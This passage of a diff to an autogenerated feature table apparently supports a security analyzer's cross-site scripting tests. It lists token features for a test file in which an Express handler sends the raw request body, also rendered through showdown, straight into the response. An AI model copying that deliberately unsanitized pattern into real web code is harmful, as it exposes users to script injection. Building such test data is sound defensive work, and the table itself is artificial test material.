autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:7:41:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:7:41:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:12:41:14 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:12:41:14 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:12:41:14 | req | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:12:41:14 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:12:41:14 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:12:41:19 | req.body | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:12:41:19 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:12:41:19 | req.body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -19726,6 +132801,46 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:12:41:19 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:12:41:19 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:12:41:19 | req.body | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:16:41:19 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:16:41:19 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:16:41:19 | body | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:16:41:19 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:41:16:41:19 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:5 | res | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:10 | res.send | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:40 | exceptional return of res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:40 | exceptional return of res.sen ... .body)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:40 | exceptional return of res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:40 | exceptional return of res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:40 | exceptional return of res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:40 | res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:40 | res.sen ... .body)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:40 | res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:40 | res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:3:42:40 | res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:7:42:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:7:42:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:7:42:10 | send | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:7:42:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:7:42:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:20 | converter | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:20 | converter | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:20 | converter | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:20 | converter | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:20 | converter | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:29 | converter.makeHtml | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:29 | converter.makeHtml | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:29 | converter.makeHtml | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:29 | converter.makeHtml | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:29 | converter.makeHtml | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:39 | convert ... q.body) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:39 | convert ... q.body) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:39 | convert ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -19734,6 +132849,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:39 | convert ... q.body) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:39 | convert ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:39 | convert ... q.body) | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:39 | exceptional return of convert ... q.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:39 | exceptional return of convert ... q.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:39 | exceptional return of convert ... q.body) | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:39 | exceptional return of convert ... q.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:12:42:39 | exceptional return of convert ... q.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:22:42:29 | makeHtml | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:22:42:29 | makeHtml | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:22:42:29 | makeHtml | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:22:42:29 | makeHtml | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:22:42:29 | makeHtml | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:31:42:33 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:31:42:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:31:42:33 | req | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:31:42:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:31:42:33 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:31:42:38 | req.body | CalleeFlexibleAccessPath | converter.makeHtml | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:31:42:38 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:31:42:38 | req.body | calleeImports | showdown | @@ -19743,36 +132873,152 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:31:42:38 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:31:42:38 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:31:42:38 | req.body | receiverName | converter | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:35:42:38 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:35:42:38 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:35:42:38 | body | enclosingFunctionBody | req res res send req body res send converter makeHtml req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:35:42:38 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:42:35:42:38 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:5:45:11 | unified | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:5:45:11 | unified | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:5:45:11 | unified | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:5:45:11 | unified | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:5:45:32 | unified | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:5:45:32 | unified | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:5:45:32 | unified | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:5:45:32 | unified ... ified') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:5:45:32 | unified ... ified') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:5:45:32 | unified ... ified') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:15:45:21 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:15:45:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:15:45:21 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:15:45:32 | exceptional return of require('unified') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:15:45:32 | exceptional return of require('unified') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:15:45:32 | exceptional return of require('unified') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:15:45:32 | require('unified') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:15:45:32 | require('unified') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:15:45:32 | require('unified') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:23:45:31 | 'unified' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:23:45:31 | 'unified' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:23:45:31 | 'unified' | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:23:45:31 | 'unified' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:23:45:31 | 'unified' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:45:23:45:31 | 'unified' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:5:46:12 | markdown | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:5:46:12 | markdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:5:46:12 | markdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:5:46:12 | markdown | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:5:46:38 | markdow ... parse') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:5:46:38 | markdow ... parse') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:5:46:38 | markdow ... parse') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:5:46:38 | markdown | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:5:46:38 | markdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:5:46:38 | markdown | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:16:46:22 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:16:46:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:16:46:22 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:16:46:38 | exceptional return of require ... parse') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:16:46:38 | exceptional return of require ... parse') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:16:46:38 | exceptional return of require ... parse') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:16:46:38 | require ... parse') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:16:46:38 | require ... parse') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:16:46:38 | require ... parse') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:24:46:37 | 'remark-parse' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:24:46:37 | 'remark-parse' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:24:46:37 | 'remark-parse' | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:24:46:37 | 'remark-parse' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:24:46:37 | 'remark-parse' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:46:24:46:37 | 'remark-parse' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:5:47:17 | remark2rehype | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:5:47:17 | remark2rehype | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:5:47:17 | remark2rehype | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:5:47:17 | remark2rehype | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:5:47:44 | remark2 ... ehype') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:5:47:44 | remark2 ... ehype') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:5:47:44 | remark2 ... ehype') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:5:47:44 | remark2rehype | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:5:47:44 | remark2rehype | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:5:47:44 | remark2rehype | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:21:47:27 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:21:47:27 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:21:47:27 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:21:47:44 | exceptional return of require ... ehype') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:21:47:44 | exceptional return of require ... ehype') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:21:47:44 | exceptional return of require ... ehype') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:21:47:44 | require ... ehype') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:21:47:44 | require ... ehype') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:21:47:44 | require ... ehype') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:29:47:43 | 'remark-rehype' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:29:47:43 | 'remark-rehype' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:29:47:43 | 'remark-rehype' | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:29:47:43 | 'remark-rehype' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:29:47:43 | 'remark-rehype' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:47:29:47:43 | 'remark-rehype' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:5:48:7 | doc | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:5:48:7 | doc | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:5:48:7 | doc | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:5:48:7 | doc | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:5:48:36 | doc | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:5:48:36 | doc | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:5:48:36 | doc | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:5:48:36 | doc = r ... ument') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:5:48:36 | doc = r ... ument') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:5:48:36 | doc = r ... ument') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:11:48:17 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:11:48:17 | require | contextSurroundingFunctionParameters | | +| 